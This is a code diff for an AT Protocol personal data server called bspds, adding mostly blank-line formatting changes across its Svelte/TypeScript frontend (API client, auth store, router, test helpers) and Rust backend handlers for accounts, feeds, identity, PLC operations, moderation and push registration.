+11 frontend/src/App.svelte
···
import Settings from './routes/Settings.svelte'
import Notifications from './routes/Notifications.svelte'
import RepoExplorer from './routes/RepoExplorer.svelte'
+
const auth = getAuthState()
+
$effect(() => {
initAuth()
})
+
function getComponent(path: string) {
switch (path) {
case '/login':
···
return auth.session ? Dashboard : Login
}
}
+
let currentPath = $derived(getCurrentPath())
let CurrentComponent = $derived(getComponent(currentPath))
</script>
+
<main>
{#if auth.loading}
<div class="loading">
···
<CurrentComponent />
{/if}
</main>
+
<style>
:global(:root) {
--bg-primary: #fafafa;
···
--warning-bg: #ffd;
--warning-text: #660;
}
+
@media (prefers-color-scheme: dark) {
:global(:root) {
--bg-primary: #1a1a1a;
···
--warning-text: #c6c67b;
}
}
+
:global(body) {
margin: 0;
font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
···
color: var(--text-primary);
background: var(--bg-primary);
}
+
:global(*) {
box-sizing: border-box;
}
+
main {
min-height: 100vh;
background: var(--bg-primary);
}
+
.loading {
display: flex;
align-items: center;
+37 frontend/src/lib/api.ts
···
const API_BASE = '/xrpc'
+
export class ApiError extends Error {
public did?: string
constructor(public status: number, public error: string, message: string, did?: string) {
···
this.did = did
}
}
+
async function xrpc<T>(method: string, options?: {
method?: 'GET' | 'POST'
params?: Record<string, string>
···
}
return res.json()
}
+
export interface Session {
did: string
handle: string
···
accessJwt: string
refreshJwt: string
}
+
export interface AppPassword {
name: string
createdAt: string
}
+
export interface InviteCode {
code: string
available: number
···
createdAt: string
uses: { usedBy: string; usedAt: string }[]
}
+
export type VerificationChannel = 'email' | 'discord' | 'telegram' | 'signal'
+
export interface CreateAccountParams {
handle: string
email: string
···
telegramUsername?: string
signalNumber?: string
}
+
export interface CreateAccountResult {
handle: string
did: string
verificationRequired: boolean
verificationChannel: string
}
+
export interface ConfirmSignupResult {
accessJwt: string
refreshJwt: string
···
preferredChannel?: string
preferredChannelVerified?: boolean
}
+
export const api = {
async createAccount(params: CreateAccountParams): Promise<CreateAccountResult> {
return xrpc('com.atproto.server.createAccount', {
···
},
})
},
+
async confirmSignup(did: string, verificationCode: string): Promise<ConfirmSignupResult> {
return xrpc('com.atproto.server.confirmSignup', {
method: 'POST',
body: { did, verificationCode },
})
},
+
async resendVerification(did: string): Promise<{ success: boolean }> {
return xrpc('com.atproto.server.resendVerification', {
method: 'POST',
body: { did },
})
},
+
async createSession(identifier: string, password: string): Promise<Session> {
return xrpc('com.atproto.server.createSession', {
method: 'POST',
body: { identifier, password },
})
},
+
async getSession(token: string): Promise<Session> {
return xrpc('com.atproto.server.getSession', { token })
},
+
async refreshSession(refreshJwt: string): Promise<Session> {
return xrpc('com.atproto.server.refreshSession', {
method: 'POST',
token: refreshJwt,
})
},
+
async deleteSession(token: string): Promise<void> {
await xrpc('com.atproto.server.deleteSession', {
method: 'POST',
token,
})
},
+
async listAppPasswords(token: string): Promise<{ passwords: AppPassword[] }> {
return xrpc('com.atproto.server.listAppPasswords', { token })
},
+
async createAppPassword(token: string, name: string): Promise<{ name: string; password: string; createdAt: string }> {
return xrpc('com.atproto.server.createAppPassword', {
method: 'POST',
···
body: { name },
})
},
+
async revokeAppPassword(token: string, name: string): Promise<void> {
await xrpc('com.atproto.server.revokeAppPassword', {
method: 'POST',
···
body: { name },
})
},
+
async getAccountInviteCodes(token: string): Promise<{ codes: InviteCode[] }> {
return xrpc('com.atproto.server.getAccountInviteCodes', { token })
},
+
async createInviteCode(token: string, useCount: number = 1): Promise<{ code: string }> {
return xrpc('com.atproto.server.createInviteCode', {
method: 'POST',
···
body: { useCount },
})
},
+
async requestPasswordReset(email: string): Promise<void> {
await xrpc('com.atproto.server.requestPasswordReset', {
method: 'POST',
body: { email },
})
},
+
async resetPassword(token: string, password: string): Promise<void> {
await xrpc('com.atproto.server.resetPassword', {
method: 'POST',
body: { token, password },
})
},
+
async requestEmailUpdate(token: string): Promise<{ tokenRequired: boolean }> {
return xrpc('com.atproto.server.requestEmailUpdate', {
method: 'POST',
token,
})
},
+
async updateEmail(token: string, email: string, emailToken?: string): Promise<void> {
await xrpc('com.atproto.server.updateEmail', {
method: 'POST',
···
body: { email, token: emailToken },
})
},
+
async updateHandle(token: string, handle: string): Promise<void> {
await xrpc('com.atproto.identity.updateHandle', {
method: 'POST',
···
body: { handle },
})
},
+
async requestAccountDelete(token: string): Promise<void> {
await xrpc('com.atproto.server.requestAccountDelete', {
method: 'POST',
token,
})
},
+
async deleteAccount(did: string, password: string, deleteToken: string): Promise<void> {
await xrpc('com.atproto.server.deleteAccount', {
method: 'POST',
body: { did, password, token: deleteToken },
})
},
+
async describeServer(): Promise<{
availableUserDomains: string[]
inviteCodeRequired: boolean
···
}> {
return xrpc('com.atproto.server.describeServer')
},
+
async getNotificationPrefs(token: string): Promise<{
preferredChannel: string
email: string
···
}> {
return xrpc('com.bspds.account.getNotificationPrefs', { token })
},
+
async updateNotificationPrefs(token: string, prefs: {
preferredChannel?: string
discordId?: string
···
body: prefs,
})
},
+
async describeRepo(token: string, repo: string): Promise<{
handle: string
did: string
···
params: { repo },
})
},
+
async listRecords(token: string, repo: string, collection: string, options?: {
limit?: number
cursor?: string
···
if (options?.reverse) params.reverse = 'true'
return xrpc('com.atproto.repo.listRecords', { token, params })
},
+
async getRecord(token: string, repo: string, collection: string, rkey: string): Promise<{
uri: string
cid: string
···
params: { repo, collection, rkey },
})
},
+
async createRecord(token: string, repo: string, collection: string, record: unknown, rkey?: string): Promise<{
uri: string
cid: string
···
body: { repo, collection, record, rkey },
})
},
+
async putRecord(token: string, repo: string, collection: string, rkey: string, record: unknown): Promise<{
uri: string
cid: string
···
body: { repo, collection, rkey, record },
})
},
+
async deleteRecord(token: string, repo: string, collection: string, rkey: string): Promise<void> {
await xrpc('com.atproto.repo.deleteRecord', {
method: 'POST',
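For orientation, a minimal usage sketch of the `api` client above (not part of the diff). Only the `createSession` and `listRecords` signatures are taken from `frontend/src/lib/api.ts`; the import path, the `app.bsky.feed.post` collection, and the wrapper function are illustrative assumptions.

// Hypothetical usage sketch — assumes only the api exports shown in the diff above.
import { api, ApiError } from './lib/api'

async function listMyPosts(identifier: string, password: string) {
  try {
    // createSession(identifier, password) resolves to a Session carrying did + accessJwt
    const session = await api.createSession(identifier, password)
    // listRecords(token, repo, collection, options?) — the response shape is elided in the diff,
    // so it is logged as-is here
    const records = await api.listRecords(session.accessJwt, session.did, 'app.bsky.feed.post', { limit: 10 })
    console.log(records)
  } catch (e) {
    if (e instanceof ApiError) console.error(e.status, e.error, e.message)
    else throw e
  }
}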
+16 frontend/src/lib/auth.svelte.ts
···
import { api, type Session, type CreateAccountParams, type CreateAccountResult, ApiError } from './api'
+
const STORAGE_KEY = 'bspds_session'
+
interface AuthState {
session: Session | null
loading: boolean
error: string | null
}
+
let state = $state<AuthState>({
session: null,
loading: true,
error: null,
})
+
function saveSession(session: Session | null) {
if (session) {
localStorage.setItem(STORAGE_KEY, JSON.stringify(session))
···
localStorage.removeItem(STORAGE_KEY)
}
}
+
function loadSession(): Session | null {
const stored = localStorage.getItem(STORAGE_KEY)
if (stored) {
···
}
return null
}
+
export async function initAuth() {
state.loading = true
state.error = null
···
}
state.loading = false
}
+
export async function login(identifier: string, password: string): Promise<void> {
state.loading = true
state.error = null
···
state.loading = false
}
}
+
export async function register(params: CreateAccountParams): Promise<CreateAccountResult> {
try {
const result = await api.createAccount(params)
···
throw e
}
}
+
export async function confirmSignup(did: string, verificationCode: string): Promise<void> {
state.loading = true
state.error = null
···
state.loading = false
}
}
+
export async function resendVerification(did: string): Promise<void> {
try {
await api.resendVerification(did)
···
throw new Error('Failed to resend verification code')
}
}
+
export async function logout(): Promise<void> {
if (state.session) {
try {
···
state.session = null
saveSession(null)
}
+
export function getAuthState() {
return state
}
+
export function getToken(): string | null {
return state.session?.accessJwt ?? null
}
+
export function isAuthenticated(): boolean {
return state.session !== null
}
+
export function _testSetState(newState: { session: Session | null; loading: boolean; error: string | null }) {
state.session = newState.session
state.loading = newState.loading
state.error = newState.error
}
+
export function _testReset() {
state.session = null
state.loading = true
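A small usage sketch for the auth store, again not part of the diff. Only the exported `login`, `logout`, `getAuthState`, and `isAuthenticated` functions and the `AuthState` fields shown above are taken from `auth.svelte.ts`; the handlers themselves are hypothetical.

// Hypothetical usage sketch — assumes only the exports visible in auth.svelte.ts above.
import { login, logout, getAuthState, isAuthenticated } from './lib/auth.svelte'

const auth = getAuthState()

async function handleSignIn(identifier: string, password: string) {
  await login(identifier, password)   // resets loading/error on the shared $state store before the attempt
  if (isAuthenticated()) {
    console.log('signed in as', auth.session?.handle)
  } else {
    console.error('sign-in failed', auth.error)
  }
}

async function handleSignOut() {
  await logout()                      // clears auth.session and the persisted copy via saveSession(null)
}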
+3 frontend/src/lib/router.svelte.ts
···
let currentPath = $state(window.location.hash.slice(1) || '/')
+
window.addEventListener('hashchange', () => {
currentPath = window.location.hash.slice(1) || '/'
})
+
export function navigate(path: string) {
window.location.hash = path
}
+
export function getCurrentPath() {
return currentPath
}
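And a one-liner sketch for the hash router, assuming nothing beyond the `navigate`/`getCurrentPath` exports shown above.

// Hypothetical usage sketch — hash-based navigation as defined in router.svelte.ts above.
import { navigate, getCurrentPath } from './lib/router.svelte'

navigate('/settings')            // assigns window.location.hash = '/settings'
// currentPath updates once the 'hashchange' listener registered above has fired
console.log(getCurrentPath())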
+2 frontend/src/main.ts
+4 frontend/src/tests/setup.ts
···
import '@testing-library/jest-dom/vitest'
import { vi, beforeEach, afterEach } from 'vitest'
import { _testReset } from '../lib/auth.svelte'
+
let locationHash = ''
+
Object.defineProperty(window, 'location', {
value: {
get hash() { return locationHash },
···
writable: true,
configurable: true,
})
+
beforeEach(() => {
vi.clearAllMocks()
localStorage.clear()
···
locationHash = ''
_testReset()
})
+
afterEach(() => {
vi.restoreAllMocks()
})
+7 frontend/src/tests/utils.ts
···
import { render, type RenderResult } from '@testing-library/svelte'
import { tick } from 'svelte'
import type { ComponentType } from 'svelte'
+
export async function renderAndWait<T extends ComponentType>(
component: T,
options?: Parameters<typeof render>[1]
···
await new Promise(resolve => setTimeout(resolve, 0))
return result
}
+
export async function waitForElement(
queryFn: () => HTMLElement | null,
timeout = 1000
···
}
throw new Error('Element not found within timeout')
}
+
export async function waitForElementToDisappear(
queryFn: () => HTMLElement | null,
timeout = 1000
···
}
throw new Error('Element still present after timeout')
}
+
export async function waitForText(
container: HTMLElement,
text: string | RegExp,
···
}
throw new Error(`Text "${text}" not found within timeout`)
}
+
export function mockLocalStorage(initialData: Record<string, string> = {}): void {
const store: Record<string, string> = { ...initialData }
Object.defineProperty(window, 'localStorage', {
···
writable: true,
})
}
+
export function setAuthState(session: {
did: string
handle: string
···
}): void {
localStorage.setItem('session', JSON.stringify(session))
}
+
export function clearAuthState(): void {
localStorage.removeItem('session')
}
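For the test helpers, a minimal sketch of how they might be combined in a Vitest spec; only the `renderAndWait` and `waitForText` signatures are taken from `utils.ts` above, while the `Login` route and the expected text are stand-ins.

// Hypothetical test sketch — uses only helpers defined in tests/utils.ts above.
import { describe, it } from 'vitest'
import Login from '../routes/Login.svelte'
import { renderAndWait, waitForText } from './utils'

describe('Login', () => {
  it('renders the sign-in form', async () => {
    const { container } = await renderAndWait(Login)   // render, then flush pending async work
    await waitForText(container, /sign in/i)           // polls until the text appears or times out
  })
})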
+1 src/api/actor/mod.rs
+3 src/api/actor/preferences.rs
···
};
use serde::{Deserialize, Serialize};
use serde_json::{json, Value};
+
const APP_BSKY_NAMESPACE: &str = "app.bsky";
const MAX_PREFERENCES_COUNT: usize = 100;
const MAX_PREFERENCE_SIZE: usize = 10_000;
+
#[derive(Serialize)]
pub struct GetPreferencesOutput {
pub preferences: Vec<Value>,
···
.collect();
(StatusCode::OK, Json(GetPreferencesOutput { preferences })).into_response()
}
+
#[derive(Deserialize)]
pub struct PutPreferencesInput {
pub preferences: Vec<Value>,
+9 src/api/actor/profile.rs
···
use serde_json::{json, Value};
use std::collections::HashMap;
use tracing::{error, info};
+
#[derive(Deserialize)]
pub struct GetProfileParams {
pub actor: String,
}
+
#[derive(Deserialize)]
pub struct GetProfilesParams {
pub actors: String,
}
+
#[derive(Serialize, Deserialize, Clone)]
#[serde(rename_all = "camelCase")]
pub struct ProfileViewDetailed {
···
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
+
#[derive(Serialize, Deserialize)]
pub struct GetProfilesOutput {
pub profiles: Vec<ProfileViewDetailed>,
}
+
async fn get_local_profile_record(state: &AppState, did: &str) -> Option<Value> {
let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did)
.fetch_optional(&state.db)
···
let block_bytes = state.block_store.get(&cid).await.ok()??;
serde_ipld_dagcbor::from_slice(&block_bytes).ok()
}
+
fn munge_profile_with_local(profile: &mut ProfileViewDetailed, local_record: &Value) {
if let Some(display_name) = local_record.get("displayName").and_then(|v| v.as_str()) {
profile.display_name = Some(display_name.to_string());
···
profile.description = Some(description.to_string());
}
}
+
async fn proxy_to_appview(
method: &str,
params: &HashMap<String, String>,
···
}
}
}
+
pub async fn get_profile(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
(StatusCode::OK, Json(profile)).into_response()
}
+
pub async fn get_profiles(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+2 src/api/admin/account/delete.rs
+3 src/api/admin/account/email.rs
···
use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::{error, warn};
+
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct SendEmailInput {
···
pub subject: Option<String>,
pub comment: Option<String>,
}
+
#[derive(Serialize)]
pub struct SendEmailOutput {
pub sent: bool,
}
+
pub async fn send_email(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+6 src/api/admin/account/info.rs
···
use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::error;
+
#[derive(Deserialize)]
pub struct GetAccountInfoParams {
pub did: String,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct AccountInfo {
···
pub email_confirmed_at: Option<String>,
pub deactivated_at: Option<String>,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct GetAccountInfosOutput {
pub infos: Vec<AccountInfo>,
}
+
pub async fn get_account_info(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
}
}
+
#[derive(Deserialize)]
pub struct GetAccountInfosParams {
pub dids: String,
}
+
pub async fn get_account_infos(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+1 src/api/admin/account/mod.rs
+6 src/api/admin/account/update.rs
···
use serde::Deserialize;
use serde_json::json;
use tracing::error;
+
#[derive(Deserialize)]
pub struct UpdateAccountEmailInput {
pub account: String,
pub email: String,
}
+
pub async fn update_account_email(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
}
}
+
#[derive(Deserialize)]
pub struct UpdateAccountHandleInput {
pub did: String,
pub handle: String,
}
+
pub async fn update_account_handle(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
}
}
+
#[derive(Deserialize)]
pub struct UpdateAccountPasswordInput {
pub did: String,
pub password: String,
}
+
pub async fn update_account_password(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+11 src/api/admin/invite.rs
···
use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::error;
+
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct DisableInviteCodesInput {
pub codes: Option<Vec<String>>,
pub accounts: Option<Vec<String>>,
}
+
pub async fn disable_invite_codes(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
(StatusCode::OK, Json(json!({}))).into_response()
}
+
#[derive(Deserialize)]
pub struct GetInviteCodesParams {
pub sort: Option<String>,
pub limit: Option<i64>,
pub cursor: Option<String>,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct InviteCodeInfo {
···
pub created_at: String,
pub uses: Vec<InviteCodeUseInfo>,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct InviteCodeUseInfo {
pub used_by: String,
pub used_at: String,
}
+
#[derive(Serialize)]
pub struct GetInviteCodesOutput {
pub cursor: Option<String>,
pub codes: Vec<InviteCodeInfo>,
}
+
pub async fn get_invite_codes(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
)
.into_response()
}
+
#[derive(Deserialize)]
pub struct DisableAccountInvitesInput {
pub account: String,
}
+
pub async fn disable_account_invites(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
}
}
+
#[derive(Deserialize)]
pub struct EnableAccountInvitesInput {
pub account: String,
}
+
pub async fn enable_account_invites(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+1 src/api/admin/mod.rs
+7 src/api/admin/status.rs
···
use serde::{Deserialize, Serialize};
use serde_json::json;
use tracing::{error, warn};
+
#[derive(Deserialize)]
pub struct GetSubjectStatusParams {
pub did: Option<String>,
pub uri: Option<String>,
pub blob: Option<String>,
}
+
#[derive(Serialize)]
pub struct SubjectStatus {
pub subject: serde_json::Value,
pub takedown: Option<StatusAttr>,
pub deactivated: Option<StatusAttr>,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct StatusAttr {
pub applied: bool,
pub r#ref: Option<String>,
}
+
pub async fn get_subject_status(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
)
.into_response()
}
+
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct UpdateSubjectStatusInput {
···
pub takedown: Option<StatusAttrInput>,
pub deactivated: Option<StatusAttrInput>,
}
+
#[derive(Deserialize)]
pub struct StatusAttrInput {
pub apply: bool,
pub r#ref: Option<String>,
}
+
pub async fn update_subject_status(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+7 src/api/error.rs
···
response::{IntoResponse, Response},
};
use serde::Serialize;
+
#[derive(Debug, Serialize)]
struct ErrorBody {
error: &'static str,
#[serde(skip_serializing_if = "Option::is_none")]
message: Option<String>,
}
+
#[derive(Debug)]
pub enum ApiError {
InternalError,
···
UpstreamUnavailable(String),
UpstreamError { status: u16, error: Option<String>, message: Option<String> },
}
+
impl ApiError {
fn status_code(&self) -> StatusCode {
match self {
···
Self::UpstreamError { status, error: None, message: None }
}
}
+
impl IntoResponse for ApiError {
fn into_response(self) -> Response {
let body = ErrorBody {
···
(self.status_code(), Json(body)).into_response()
}
}
+
impl From<sqlx::Error> for ApiError {
fn from(e: sqlx::Error) -> Self {
tracing::error!("Database error: {:?}", e);
Self::DatabaseError
}
}
+
impl From<crate::auth::TokenValidationError> for ApiError {
fn from(e: crate::auth::TokenValidationError) -> Self {
match e {
···
}
}
}
+
impl From<crate::util::DbLookupError> for ApiError {
fn from(e: crate::util::DbLookupError) -> Self {
match e {
+3 src/api/feed/actor_likes.rs
···
use serde_json::Value;
use std::collections::HashMap;
use tracing::warn;
+
#[derive(Deserialize)]
pub struct GetActorLikesParams {
pub actor: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
+
fn insert_likes_into_feed(feed: &mut Vec<FeedViewPost>, likes: &[RecordDescript<LikeRecord>]) {
for like in likes {
let like_time = &like.indexed_at.to_rfc3339();
···
);
}
}
+
pub async fn get_actor_likes(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+2 src/api/feed/custom_feed.rs
···
use serde::Deserialize;
use std::collections::HashMap;
use tracing::{error, info};
+
#[derive(Deserialize)]
pub struct GetFeedParams {
pub feed: String,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
+
pub async fn get_feed(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+1 src/api/feed/mod.rs
+10 src/api/feed/post_thread.rs
···
use serde_json::{json, Value};
use std::collections::HashMap;
use tracing::warn;
+
#[derive(Deserialize)]
pub struct GetPostThreadParams {
pub uri: String,
···
#[serde(rename = "parentHeight")]
pub parent_height: Option<u32>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadViewPost {
···
#[serde(flatten)]
pub extra: HashMap<String, Value>,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
pub enum ThreadNode {
···
NotFound(ThreadNotFound),
Blocked(ThreadBlocked),
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadNotFound {
···
pub uri: String,
pub not_found: bool,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct ThreadBlocked {
···
pub blocked: bool,
pub author: Value,
}
+
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct PostThreadOutput {
pub thread: ThreadNode,
#[serde(skip_serializing_if = "Option::is_none")]
pub threadgate: Option<Value>,
}
+
const MAX_THREAD_DEPTH: usize = 10;
+
fn add_replies_to_thread(
thread: &mut ThreadViewPost,
local_posts: &[RecordDescript<PostRecord>],
···
}
}
}
+
pub async fn get_post_thread(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
let lag = get_local_lag(&local_records);
format_munged_response(thread_output, lag)
}
+
async fn handle_not_found(
state: &AppState,
uri: &str,
+4 src/api/feed/timeline.rs
···
use serde_json::{json, Value};
use std::collections::HashMap;
use tracing::warn;
+
#[derive(Deserialize)]
pub struct GetTimelineParams {
pub algorithm: Option<String>,
pub limit: Option<u32>,
pub cursor: Option<String>,
}
+
pub async fn get_timeline(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
get_timeline_local_only(&state, &auth_user.did).await
}
+
async fn get_timeline_with_appview(
state: &AppState,
headers: &axum::http::HeaderMap,
···
let lag = get_local_lag(&local_records);
format_munged_response(feed_output, lag)
}
+
async fn get_timeline_local_only(state: &AppState, auth_did: &str) -> Response {
let user_id: uuid::Uuid = match sqlx::query_scalar!(
"SELECT id FROM users WHERE did = $1",
+4 src/api/identity/account.rs
···
use serde_json::json;
use std::sync::Arc;
use tracing::{error, info, warn};
+
fn extract_client_ip(headers: &HeaderMap) -> String {
if let Some(forwarded) = headers.get("x-forwarded-for") {
if let Ok(value) = forwarded.to_str() {
···
}
"unknown".to_string()
}
+
#[derive(Deserialize)]
#[serde(rename_all = "camelCase")]
pub struct CreateAccountInput {
···
pub telegram_username: Option<String>,
pub signal_number: Option<String>,
}
+
#[derive(Serialize)]
#[serde(rename_all = "camelCase")]
pub struct CreateAccountOutput {
···
pub verification_required: bool,
pub verification_channel: String,
}
+
pub async fn create_account(
State(state): State<AppState>,
headers: HeaderMap,
+14 src/api/identity/did.rs
···
use serde::Deserialize;
use serde_json::json;
use tracing::{error, warn};
+
#[derive(Deserialize)]
pub struct ResolveHandleParams {
pub handle: String,
}
+
pub async fn resolve_handle(
State(state): State<AppState>,
Query(params): Query<ResolveHandleParams>,
···
}
}
}
+
pub fn get_jwk(key_bytes: &[u8]) -> Result<serde_json::Value, &'static str> {
let secret_key = SecretKey::from_slice(key_bytes).map_err(|_| "Invalid key length")?;
let public_key = secret_key.public_key();
···
"y": y_b64
}))
}
+
pub async fn well_known_did(State(_state): State<AppState>) -> impl IntoResponse {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
// Kinda for local dev, encode hostname if it contains port
···
}]
}))
}
+
pub async fn user_did_doc(State(state): State<AppState>, Path(handle): Path<String>) -> Response {
let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string());
let user = sqlx::query!("SELECT id, did FROM users WHERE handle = $1", handle)
···
}]
})).into_response()
}
+
pub async fn verify_did_web(did: &str, hostname: &str, handle: &str) -> Result<(), String> {
let expected_prefix = if hostname.contains(':') {
format!("did:web:{}", hostname.replace(':', "%3A"))
···
}
}
}
+
#[derive(serde::Serialize)]
#[serde(rename_all = "camelCase")]
pub struct GetRecommendedDidCredentialsOutput {
···
pub verification_methods: VerificationMethods,
pub services: Services,
}
+
#[derive(serde::Serialize)]
#[serde(rename_all = "camelCase")]
pub struct VerificationMethods {
pub atproto: String,
}
+
#[derive(serde::Serialize)]
#[serde(rename_all = "camelCase")]
pub struct Services {
pub atproto_pds: AtprotoPds,
}
+
#[derive(serde::Serialize)]
#[serde(rename_all = "camelCase")]
pub struct AtprotoPds {
···
pub service_type: String,
pub endpoint: String,
}
+
pub async fn get_recommended_did_credentials(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
)
.into_response()
}
+
#[derive(Deserialize)]
pub struct UpdateHandleInput {
pub handle: String,
}
+
pub async fn update_handle(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
···
}
}
}
+
pub async fn well_known_atproto_did(
State(state): State<AppState>,
headers: HeaderMap,
+1 src/api/identity/mod.rs
+1 src/api/identity/plc/mod.rs
+2 src/api/identity/plc/request.rs
···
use chrono::{Duration, Utc};
use serde_json::json;
use tracing::{error, info, warn};
+
fn generate_plc_token() -> String {
crate::util::generate_token_code()
}
+
pub async fn request_plc_operation_signature(
State(state): State<AppState>,
headers: axum::http::HeaderMap,
+4
src/api/identity/plc/sign.rs
+4
src/api/identity/plc/sign.rs
···
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
#[derive(Debug, Deserialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct SignPlcOperationInput {
···
25
pub verification_methods: Option<HashMap<String, String>>,
26
pub services: Option<HashMap<String, ServiceInput>>,
27
}
28
#[derive(Debug, Deserialize, Clone)]
29
pub struct ServiceInput {
30
#[serde(rename = "type")]
31
pub service_type: String,
32
pub endpoint: String,
33
}
34
#[derive(Debug, Serialize)]
35
pub struct SignPlcOperationOutput {
36
pub operation: Value,
37
}
38
pub async fn sign_plc_operation(
39
State(state): State<AppState>,
40
headers: axum::http::HeaderMap,
···
16
use serde_json::{json, Value};
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
+
20
#[derive(Debug, Deserialize)]
21
#[serde(rename_all = "camelCase")]
22
pub struct SignPlcOperationInput {
···
26
pub verification_methods: Option<HashMap<String, String>>,
27
pub services: Option<HashMap<String, ServiceInput>>,
28
}
29
+
30
#[derive(Debug, Deserialize, Clone)]
31
pub struct ServiceInput {
32
#[serde(rename = "type")]
33
pub service_type: String,
34
pub endpoint: String,
35
}
36
+
37
#[derive(Debug, Serialize)]
38
pub struct SignPlcOperationOutput {
39
pub operation: Value,
40
}
41
+
42
pub async fn sign_plc_operation(
43
State(state): State<AppState>,
44
headers: axum::http::HeaderMap,
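ServiceInput maps the wire-level "type" key onto service_type, and SignPlcOperationInput itself is camelCase on the wire. A small sketch of the rename using only the fields visible in this hunk (the folded fields of SignPlcOperationInput are omitted, and the endpoint value is illustrative):

use serde_json::json;

// ServiceInput: the JSON key "type" deserializes into service_type.
let svc: ServiceInput = serde_json::from_value(json!({
    "type": "AtprotoPersonalDataServer",
    "endpoint": "https://pds.example.com"
}))
.expect("valid service entry");
assert_eq!(svc.service_type, "AtprotoPersonalDataServer");
assert_eq!(svc.endpoint, "https://pds.example.com");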
+2
src/api/identity/plc/submit.rs
···
12
use serde::Deserialize;
13
use serde_json::{json, Value};
14
use tracing::{error, info, warn};
15
#[derive(Debug, Deserialize)]
16
pub struct SubmitPlcOperationInput {
17
pub operation: Value,
18
}
19
pub async fn submit_plc_operation(
20
State(state): State<AppState>,
21
headers: axum::http::HeaderMap,
···
12
use serde::Deserialize;
13
use serde_json::{json, Value};
14
use tracing::{error, info, warn};
15
+
16
#[derive(Debug, Deserialize)]
17
pub struct SubmitPlcOperationInput {
18
pub operation: Value,
19
}
20
+
21
pub async fn submit_plc_operation(
22
State(state): State<AppState>,
23
headers: axum::http::HeaderMap,
+1
src/api/mod.rs
+3
src/api/moderation/mod.rs
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::{Value, json};
11
use tracing::error;
12
#[derive(Deserialize)]
13
#[serde(rename_all = "camelCase")]
14
pub struct CreateReportInput {
···
16
pub reason: Option<String>,
17
pub subject: Value,
18
}
19
#[derive(Serialize)]
20
#[serde(rename_all = "camelCase")]
21
pub struct CreateReportOutput {
···
26
pub reported_by: String,
27
pub created_at: String,
28
}
29
pub async fn create_report(
30
State(state): State<AppState>,
31
headers: axum::http::HeaderMap,
···
9
use serde::{Deserialize, Serialize};
10
use serde_json::{Value, json};
11
use tracing::error;
12
+
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct CreateReportInput {
···
17
pub reason: Option<String>,
18
pub subject: Value,
19
}
20
+
21
#[derive(Serialize)]
22
#[serde(rename_all = "camelCase")]
23
pub struct CreateReportOutput {
···
28
pub reported_by: String,
29
pub created_at: String,
30
}
31
+
32
pub async fn create_report(
33
State(state): State<AppState>,
34
headers: axum::http::HeaderMap,
+1
src/api/notification/mod.rs
+3
src/api/notification/register_push.rs
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info};
13
#[derive(Deserialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct RegisterPushInput {
···
18
pub platform: String,
19
pub app_id: String,
20
}
21
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
22
pub async fn register_push(
23
State(state): State<AppState>,
24
headers: HeaderMap,
···
10
use serde::Deserialize;
11
use serde_json::json;
12
use tracing::{error, info};
13
+
14
#[derive(Deserialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct RegisterPushInput {
···
19
pub platform: String,
20
pub app_id: String,
21
}
22
+
23
const VALID_PLATFORMS: &[&str] = &["ios", "android", "web"];
24
+
25
pub async fn register_push(
26
State(state): State<AppState>,
27
headers: HeaderMap,
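The platform field is checked against VALID_PLATFORMS; a sketch of the check it implies (the helper and error string are illustrative, the real handler's error shape is not visible in this hunk):

// Illustrative check against VALID_PLATFORMS = ["ios", "android", "web"].
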